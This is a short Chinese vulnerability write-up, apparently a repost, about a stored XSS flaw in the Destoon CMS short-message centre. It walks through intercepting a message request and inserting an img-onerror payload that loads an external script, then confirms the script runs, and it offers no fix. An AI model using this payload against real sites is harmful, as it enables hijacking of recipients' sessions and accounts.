首先选取一个对象我们去发消息
然后抓包,往里面填充我们的xss代码
其中的xss
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='xsscode';>
然后我们来试着点开该信息,审查元素,代码完好
看网络连接,加载成功了
修复方案:
表示不知道...
查看更多关于destoon新版短消息中心xss指谁打谁 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15594